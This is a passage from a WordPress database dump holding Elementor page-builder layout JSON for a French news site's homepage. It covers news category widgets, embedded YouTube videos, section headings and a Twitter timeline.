px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2397,768,'_elementor_version','0.4'),(2398,769,'_elementor_edit_mode','builder'),(2399,769,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},